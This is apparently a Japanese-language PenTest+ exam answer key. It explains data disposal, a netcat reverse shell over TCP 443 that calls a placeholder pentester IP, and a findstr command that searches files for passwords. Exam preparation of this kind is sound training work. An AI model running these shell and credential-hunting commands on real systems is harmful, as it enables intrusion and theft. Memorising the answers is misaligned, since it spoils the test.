侵入テストの終了時には、機密データを適切に処理することで、法律、規制、倫理のガイドラインに準拠していることが保証されます。
* すべてのエンゲージメント関連データを安全に破棄または削除します (オプション B):
* テスト結果の機密性を保証します。
* クライアント情報への不正アクセスを防止します。
* 方法には、安全な消去ツール (shred、sdelete)、暗号化されたストレージの削除などがあります。

テスターは、次の操作を許可するファイアウォール制限を回避しながら、侵害された Web サーバーから移動する必要があります。
TCP 443 (HTTPS) および TCP 53 (DNS) のみの受信トラフィック
無制限の送信トラフィック
TCP 443 を使用したリバース シェル (オプション D):
このコマンドは、ファイアウォールによって許可されているポート 443 上のペンテスターのマシンへの送信接続を開始します。
例：
/bin/sh -c 'nc <pentester_ip> 443 -e /bin/sh'
ペンテスターは TCP 443 をリッスンし、ターゲットからシェルを受信します。
参考資料: CompTIA PenTest+ PT0-003 公式学習ガイド - 「ピボットとネットワークトンネリングテクニック」 誤ったオプション:
オプション A (nc -e /bin/sh -lp 53): これは TCP 53 をリッスンしますが、送信接続を確立しません。
オプション B (nc -l -p 443): ローカルでリッスンしますが、攻撃者に接続しません。
オプション C (nc -e /bin/sh <pentester_ip> 53): TCP 53 は受信のみなので、この接続はブロックされます。

侵入テスターは、コマンド findstr /SIM /C:"pass" *.txt *.cfg *.xml を実行して、秘密を列挙しようとします。
Explanation:
* コマンド分析:
* findstr: ファイル内の特定の文字列を検索するために使用される Windows のコマンドライン ユーティリティ。
* /SIM: オプションの組み合わせ。/S は現在のディレクトリとすべてのサブディレクトリで一致するファイルを検索し、/I は大文字と小文字を区別しない検索を指定し、/M は一致する内容のファイル名のみを出力します。
* /C:"pass": リテラル文字列 "pass" を検索します。
* ***.txt .cfg .xml: 検索対象となるファイルの種類を指定します。
* 客観的：
* このコマンドは、.txt、.cfg、.xml ファイル内で文字列「pass」を検索します。これは、パスワードやその他の機密情報 (秘密) を検索していることを示します。
* これらのファイル タイプには通常、構成の詳細、資格情報、およびパスワードや秘密情報を含む可能性のあるその他の機密データが含まれています。
* その他のオプション:
* 構成ファイル: .cfgファイルや.xmlファイルは構成ファイルとして使用できますが、
「pass」はパスワードなどの秘密を探すことを示します。
* 権限: このコマンドはファイルの権限をチェックしたり列挙したりしません。
* 仮想ホスト: このコマンドは仮想ホストの列挙とは関係ありません。
ペンテストの参考資料:
* エクスプロイト後: パスワードなどの機密情報を列挙することは、最初のアクセスを取得した後の一般的なエクスプロイト後のアクティビティです。
* 資格情報の検出: 構成ファイルやドキュメント内に保存されている資格情報を検索して、権限を昇格したり、ネットワーク内で横方向に移動したりします。
このコマンドを実行することにより、侵入テスターは、ターゲット システムのさらなる悪用に役立つ可能性のある、保存されているパスワードやその他の秘密を見つけることを目的とします。